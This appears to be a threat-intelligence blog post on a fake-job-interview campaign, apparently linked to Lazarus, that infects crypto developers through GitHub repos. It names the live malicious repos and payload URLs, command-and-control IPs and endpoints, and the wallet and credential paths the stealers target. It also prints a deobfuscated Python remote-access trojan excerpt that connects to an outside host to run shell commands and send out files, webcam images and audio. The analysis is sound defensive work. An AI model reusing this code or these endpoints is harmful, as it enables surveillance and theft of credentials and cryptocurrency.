Live Operation: Crypto Hacking Through Fake Interviews

A New Era of Cyber Heists - Disguised as Your Dream Job
It started like countless stories on LinkedIn: a well-crafted message from a recruiter, impressive company credentials, and an enticing opportunity in the rapidly expanding crypto industry. But behind the polished pitch was a sophisticated cyber operation targeting blockchain engineers, designers, data scientists, DevOps specialists, and virtually anyone working in the digital asset space.
This is the story of how we uncovered a multi-stage attack that leveraged fake job interviews to compromise developer machines, steal cryptocurrency wallets, and implant persistent Remote Access Trojans (RATs) — all under the guise of a recruitment process.
The Approach: LinkedIn as the Bait
The campaign begins with a personalized LinkedIn message from an account posing as a senior project development manager. The pitch looks legitimate: a blockchain-powered real estate platform, SOC 2 Type II compliance claims, competitive pay of $90–$130/hr, and remote work flexibility.
Once the target responds, the recruiter sends details of the project and a GitHub repository as part of the technical assessment. The instructions are simple: clone the repo, run the project locally, and give UI/UX feedback. This removes suspicion because victims are not prompted to hand over credentials, just to run code. That code, however, is where the attack begins.

Payload Delivery and Execution
The GitHub repository contains obfuscated JavaScript designed to contact remote endpoints, retrieve additional payloads, and execute them in memory. Key elements include:
Base64-encoded environment variables containing URLs, authentication headers, and execution parameters.
HTTP requests that pull payloads from attacker-controlled infrastructure.
Dynamic code execution using the
Functionconstructor, allowing direct execution of whatever the attacker sends.Two-stage infection flow where a lightweight bootstrapper downloads much larger malware strains.
These payloads led us to uncover three distinct malware families used in the operation.
Attention: don’t visit and download anything from the following links
https://github.com/tf7tune/HomeXpert
https://github.com/n0228/rental
https://github.com/tf7tune/evm-dex-platform
https://github.com/TulasidharM/Real-Estate-Rental-Platform_TulasidharM-FrontEnd
https://github.com/shrutiversee/React-Node-Test-mainThe company name Quicknode is used for this type of attack.

Uncovering the malicious projects that are live on Github

Screenshot of the malicious project on Github

.config.env variables contain the malicious URLs on npoint.io that contain malware
Attention: don’t visit and download anything from the following links
DEV_SECRET_KEY=x-secret-key
DEV_SECRET_VALUE=_
https://api.npoint.io/2169940221e8b67d2312
https://api.npoint.io/a1dbf5a9d5d0636edf76x
Execution point of the malware
Deobfuscation and Analysis of the First JavaScript Malware Sample
The first malicious payload uncovered in this campaign is a heavily obfuscated JavaScript malware, most likely delivered through a compromised browser extension or injected script. Through deobfuscation—rebuilding the hidden string array (_0x17a8) and resolving the index-mapping functions (_0x3f20, _0x1fa5e1, etc.)—we revealed its true purpose: a sophisticated credential and cryptocurrency wallet stealer targeting multiple operating systems and browsers.
Targeted Cryptocurrency and Credential Theft
This malware is engineered to scan and exfiltrate sensitive data from browser extensions that store crypto wallet information. Specific extension IDs targeted include MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) and Phantom (bfnaelmomeimhlpmgjnjgpafhpjakagm), affecting Chrome, Brave, Opera, and Mozilla browsers. It extracts files from browser storage paths such as Local Extension Settings, Local State, and user profile directories:
Windows:
~/AppData/Local/Google/Chrome/User DataLinux:
~/.config/google-chromeFirefox:
~/.mozilla/firefoxmacOS:
~/Library/Keychains/login.keychain-db
The stealer also specifically targets standalone wallet software and CLI keys, including:
Solana:
~/.config/solana/id.jsonExodus Wallet:
~/AppData/Roaming/Exodus/exodus.wallet
Exfiltration Process and C2 Infrastructure
Stolen files are uploaded to the attacker’s command-and-control (C2) server using multipart form-data requests via the request library. Files are transmitted as streams with additional metadata, such as:
htype=99gtype=69_{hostname}Filenames in the format:
69_{hostname}_0_{extension_id}_{file}
The malware supports multi-profile data theft, scanning from “Default” and numbered profiles (Profile 1–99).
Additional Malicious Capabilities
Beyond wallet and credential theft, the malware can:
Download an additional payload from the
/pdownendpoint of the C2, save it to a temporary directory, extract it viatar -xf, and execute it—potentially adding persistence or loading further modules.Implement anti-debugging techniques by overriding
console.log,console.warn, and other logging methods to suppress visible output.Detect analysis environments by using self-referential code checks and debugger detection routines.
Persistence and Evasion Tactics
While this sample does not demonstrate robust built-in persistence, the secondary payload could easily add it. It runs in continuous loops, periodically scanning for targeted paths and re-uploading data. Multiple layers of string encryption (including an RC4-like method via ATUbcZ) and self-modifying code make static analysis more difficult.
The fully deobfuscated JavaScript code spans roughly 10–15 KB, revealing a lean yet highly targeted piece of malware with a clear focus: extract as much crypto-related data as possible, as quietly as possible, and exfiltrate it to the attacker’s infrastructure.
Command-and-Control (C2) Server Analysis and Directory Structure
Primary C2 Host: 146.70.253.107:1224
This IP address has been directly linked to well-known malware families such as AsyncRAT and operations attributed to the APT Lazarus Group (a North Korean state-sponsored threat actor), according to multiple threat intelligence platforms including Maltrail and URLhaus. Based on observed behavior and infrastructure patterns, this server is functioning as a command-and-control (C2) hub for large-scale data exfiltration.
Key Directories and Endpoints
/uploads– Endpoint receiving stolen files from infected hosts via HTTP POST requests using multipart/form-data./pdown– Delivers additional malicious payloads. A GET request to this endpoint returns a compressed tar archive, typically between 1–2 MB, which is extracted and executed on the victim system.
File Retrieval and Access Characteristics
The C2 server does not expose open directory listings, meaning direct browsing will not reveal available files. However:
Attempting a direct GET request to
/pdowncan retrieve the secondary tar.gz payload within the malware’s coded size constraints.No other endpoints or directories appear to be publicly accessible without valid authentication or active exploitation.
In controlled lab environments, analysts with access to an infected machine could simulate a file upload request to observe the server’s response.
Attribution and Threat Intelligence Context
OSINT and web reconnaissance confirm this infrastructure aligns with known malware sinkhole operations. As of August 2025, there are no public dumps or archives of stolen data available. Any investigative activity against this C2 should follow ethical disclosure practices, including submission to abuse reporting platforms such as Abuse.ch URLhaus.
Deobfuscation and Deep Analysis of the Second JavaScript Malware Sample
This second malicious JavaScript sample was heavily obfuscated using array mapping functions (e()) and nested function references (g(), f()), similar to the first sample. After deobfuscation, it reveals a more advanced Remote Access Trojan (RAT) with extended surveillance and data theft capabilities targeting cryptocurrency users, developers, and IT professionals.
Expanded Theft and Surveillance Capabilities
Full Filesystem Scanning – Recursively searches all storage drives on Windows and root directories on Linux/macOS, looking for sensitive files that match patterns such as
*.env,*.metamask*,*.wallet*,*.secret*,*.txt, and*.json. These often contain cryptocurrency wallet keys, API credentials, and sensitive configs.Directory Exclusions – Skips common non-sensitive folders like
node_modules,.git, and parts ofAppDatato reduce noise and speed up scanning.Keylogging – Monitors and records keystrokes, including special keys (shift, numbers, function keys) using
node-global-key-listener.Screenshot Capture – Takes PNG or JPG snapshots on specific key events, using
screenshot-desktopand compresses them withsharpbefore exfiltration.Clipboard Monitoring – Tracks clipboard changes (with debounce to avoid excessive logging) and uploads captured content.
Remote Command Execution – Receives and runs arbitrary shell commands directly from the C2 server.
Command-and-Control (C2) Communication and Data Exfiltration
Real-Time Control – Uses
socket.io-clientto establish persistent connections to the C2’s root (/) endpoint, enabling instant command execution and file transfers.Event Logging – Sends operational logs to
/api/service/makelogvia HTTP POST.File Uploads – Exfiltrates stolen data through
/api/service/upload, often wrapping files in FormData with contextual metadata such as keystrokes or host identifiers.System Profiling – Immediately upon connection, sends OS type, hostname, and active username to the C2 for tracking infected machines.
Persistence, Evasion, and Stealth Techniques
Virtual Machine Detection – Uses Windows Management Instrumentation (WMI) to look for “vmware” or “virtualbox” processes on Windows, and
/proc/cpuinfochecks on Linux.Process Locking – Creates a PID-based lock file in the temp directory to prevent multiple instances from running.
Silent Dependency Installation – Installs its required Node.js dependencies (
socket.io-client,node-global-key-listener,screenshot-desktop,sharp) without user interaction.Anti-Debugging Measures – Employs console method overrides and self-check routines to disrupt debugging attempts.
Continuous Execution Loop – Runs indefinitely with timed intervals (typically 1000ms), ensuring persistent activity without visible user prompts.
Additional Malicious Features
Arbitrary Code Execution – Executes commands pushed from the C2 server, giving attackers full system control.
Delay & Sleep Functions – Implements execution pauses to evade behavioral detection systems and avoid triggering automated sandbox analysis.
Command-and-Control (C2) Server Analysis for Second Malware Sample
Primary C2 Host: 172.86.113.12
This server operates across multiple ports, each dedicated to different malware functions:
Port 4101 – Handles logging and process management, primarily for event tracking and infected host status reports.
Port 4106 – Maintains real-time communication with infected devices via
socket.io, enabling the attacker to issue live commands.Port 4108 – Likely reserved for encryption keys or specialized data transfer, based on observed RAT infrastructure patterns.
Threat intelligence correlations indicate this IP shares network proximity and behavioral markers with known AsyncRAT variants and APT Lazarus Group infrastructure, further supporting attribution to a sophisticated threat actor.
Key Directories and Endpoints
/api/service/makelog– Receives POST JSON requests logging activity from infected systems./api/service/process/{uid}– Accepts POST JSON uploads of detailed system profiling data, including OS, hardware, and user account information./api/service/upload– Endpoint for exfiltrating stolen files, transmitted as multipart/form-data./– Maintains the socket.io command channel for attacker-issued instructions.
File Access and Retrieval Characteristics
The server does not expose open directory listings, meaning files cannot be freely browsed. However:
Direct GET requests to
/api/client/or/might respond under authenticated sessions, potentially revealing accessible content.Without valid credentials or exploitation, file access is restricted.
Related IPs in open-source intelligence databases consistently appear in AsyncRAT and Lazarus-linked operations, confirming an advanced persistent threat infrastructure.
Security Implications and Response Recommendations
The absence of open directories does not reduce the risk—real-time socket connections and targeted upload endpoints make this C2 highly capable of continuous surveillance and theft. Any discovery of this IP within network logs should trigger immediate incident response procedures, including endpoint isolation, forensic capture, and submission to threat sharing platforms such as Abuse.ch URLhaus.
Deobfuscation Summary
The analyzed script employs a multi-layer obfuscation technique designed to conceal its malicious payload. At its core, it uses a lambda function to:
Reverse a base64-encoded byte string
Decode the reversed string back into binary form
Decompress the resulting data using the zlib compression library
Execute the decompressed payload dynamically via Python’s built-in
exec()function
This obfuscation chain is a common method in advanced malware to bypass static analysis and signature-based detection. By embedding the malicious code in an encoded and compressed format, attackers make it significantly harder for automated scanners and reverse engineers to extract and analyze the true functionality without executing the code.
Deobfuscated code (full script is ~1000 lines; here's a summarized structure with key excerpts)
import socket, subprocess, os, platform, time, shutil, sys, base64, zlib
from cryptography.fernet import Fernet
import pyautogui, pyaudio, wave, cv2, threading
from PIL import ImageGrab
import sqlite3, win32crypt, json, requests
from scipy.io.wavfile import write
import sounddevice as sd
import numpy as np
import getpass, psutil
from multiprocessing import Process, freeze_support
# C2 Server Connection
HOST = '146.70.126.152'
PORT = 5000
# Encryption Key (Fernet)
key = b'<redacted_base64_key>' # Generates or uses a hardcoded key for encrypting communications
# Connect to C2 and handle commands
def connect():
s = socket.socket()
s.connect((HOST, PORT))
while True:
command = decrypt(s.recv(1024))
if 'terminate' in command:
s.close()
sys.exit()
elif 'grab' in command:
# File exfiltration
grab, path = command.split('*')
try:
transfer(s, path)
except:
pass
elif 'screencap' in command:
# Screenshot
screenshot()
transfer(s, 's.png')
elif 'webcam' in command:
# Webcam capture
cam = cv2.VideoCapture(0)
ret, frame = cam.read()
cv2.imwrite('cam.png', frame)
transfer(s, 'cam.png')
elif 'keylog' in command:
# Keylogger start/stop/dump
# Uses pynput or similar to log keys
elif 'audio' in command:
# Audio recording
fs = 44100
seconds = int(command.split('*')[1])
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write('audio.wav', fs, myrecording)
transfer(s, 'audio.wav')
elif 'shell' in command:
# Execute shell commands
CMD = subprocess.Popen(command[6:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(encrypt(CMD.stdout.read() + CMD.stderr.read()))
# Other commands: clipboard get/set, system info, persistence, lock screen, shutdown, etc.
# Persistence
if platform.system() == 'Windows':
# Add to registry startup
copy_to_startup()
elif platform.system() in ['Linux', 'Darwin']:
# Add cron job for persistence
# Anti-VM/Sandbox Checks
def is_vm():
# Checks for processes like 'vboxservice', CPU count, disk size, etc.
if detect_sandbox():
sys.exit()
# Encryption/Decryption
f = Fernet(key)
def encrypt(data):
return f.encrypt(data)
def decrypt(data):
return f.decrypt(data)
# File Transfer
def transfer(s, path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while len(packet) > 0:
s.send(encrypt(packet))
packet = f.read(1024)
s.send(encrypt('DONE'.encode()))
else:
s.send(encrypt('File not found'.encode()))
# Keylogger Implementation
# Uses threading to log keys, saves to file, sends periodically
# Run
if __name__ == "__main__":
freeze_support()
is_vm() # Exit if VM detected
connect()
What the Code Does: Persistent Python-Based Remote Access Trojan (RAT) Analysis
This malicious script is a persistent Python-based backdoor that connects to a command-and-control (C2) server at 146.70.126.152:5000 (a known malicious IP) and awaits attacker instructions. It is designed for espionage, data theft, and full system compromise, making it a high-severity threat to both individuals and organizations.
1. Command-and-Control (C2) Communication
Establishes a TCP socket connection to the C2 server.
Encrypts and decrypts all data using Fernet symmetric encryption from the Python
cryptographylibrary.Operates in an infinite loop, continuously receiving and executing commands such as
grabfile_path(for file theft) orshellcmd(for remote command execution).
2. Data Theft and Surveillance Capabilities
File Exfiltration – Uploads any file type, including documents, cryptocurrency wallet files, and sensitive archives, directly to the C2.
Screenshot Capture – Uses
pyautoguiorPIL.ImageGrabto take screenshots, saving them as PNG before sending them to the attacker.Webcam Access – Utilizes
OpenCV (cv2)to capture images from the system’s default camera.Audio Recording – Leverages
pyaudioorsounddeviceto record microphone input for a specified duration.Keylogging – Likely uses
pynput(or a similar library) to monitor keystrokes, storing them locally and exfiltrating logs on command.Clipboard Manipulation – Reads and modifies clipboard content.
Browser Credential Theft – Extracts saved passwords and cookies from Chrome and Firefox by accessing their SQLite databases and decrypting data with
win32crypt(Windows-specific).System Profiling – Sends device details, including hostname, operating system, username, and hardware information.
3. System Control Features
Shell Execution – Executes arbitrary shell commands via Python’s
subprocessmodule and returns the output to the attacker.Lock and Shutdown Commands – Can lock the screen, restart, or shut down the machine remotely.
Download and Execute – Retrieves and runs additional malicious payloads to extend its capabilities.
4. Persistence and Evasion Techniques
Startup Registration – On Windows, adds itself to the registry or startup folder; on Linux and macOS, creates a cron job for persistence.
Anti-Analysis Checks – Scans for virtual machines or sandbox environments by looking for specific processes (e.g., VirtualBox), checking system specs (low CPU/RAM), and detecting known analysis artifacts. If detected, the malware exits immediately.
Stealth Mode – Runs silently in the background via Python’s multiprocessing, while deleting temporary files to hide evidence.
5. Cross-Platform Compatibility
Designed to operate on Windows, Linux, and macOS through conditional logic.
Requires multiple third-party dependencies (
pyautogui,pyaudio,cv2,cryptography), which it assumes are preinstalled or bundled.
Risks and Impact
This malware represents a severe cybersecurity risk with the potential to cause:
Identity theft through stolen credentials and cookies.
Financial loss if cryptocurrency wallets or banking credentials are compromised.
Privacy violations via webcam, microphone, and keylogging surveillance.
Further infection by deploying ransomware or additional RAT modules.
C2 Server Threat Profile:
The IP 146.70.126.152 is flagged in multiple threat intelligence databases for malicious activity. It has been associated with IP reputation attacks, phishing campaigns, and malware distribution, and is blocked by Malwarebytes. This address is hosted by M247 Ltd in the UK, a provider often used in bulletproof hosting for cybercriminal operations.
Malware Family Attribution:
The RAT’s structure and features resemble Python-based tools such as PyRAT and custom stealers derived from RedLine or AgentTesla, particularly the combination of Fernet encryption, pyautogui, and pyaudio modules.
Execution Trigger:
Once executed (for example, via python script.py), the malware silently initiates its C2 connection and persistence mechanisms. Likely infection vectors include phishing emails, malvertising campaigns, and software cracks or pirated applications.
Attribution: Likely Lazarus Group
Several factors suggest this operation may be linked to Lazarus Group, a North Korean state-sponsored threat actor. These include overlaps in infrastructure with known Lazarus campaigns, similar code structure and obfuscation methods to AsyncRAT-based tools used in previous operations, and the targeting of cryptocurrency-related professionals and developers.
Why This Attack Works
Professional trust is established through LinkedIn outreach. Victims willingly execute the malicious code. The multi-stage design ensures that small initial scripts pull fresh payloads that bypass traditional antivirus solutions. The focus on developers is strategic, as they often store sensitive keys and have direct access to production systems.
How Crowdcruit Protects Its Users
Strict verification is applied for all hiring companies.
A business email requirement is enforced for hiring accounts.
Security education is provided for professionals to recognize suspicious job offers.
Threat intelligence sharing is used to block known malicious infrastructure.
Conclusion: When a Job Interview Becomes a Cyber Weapon
This was more than a phishing campaign. It was a live operation blending social engineering, targeted financial theft, and advanced persistent malware. As the crypto industry grows, so does the sophistication of threats. Treat any unsolicited code requests as potential attacks and work only through trusted hiring platforms that actively verify employers.


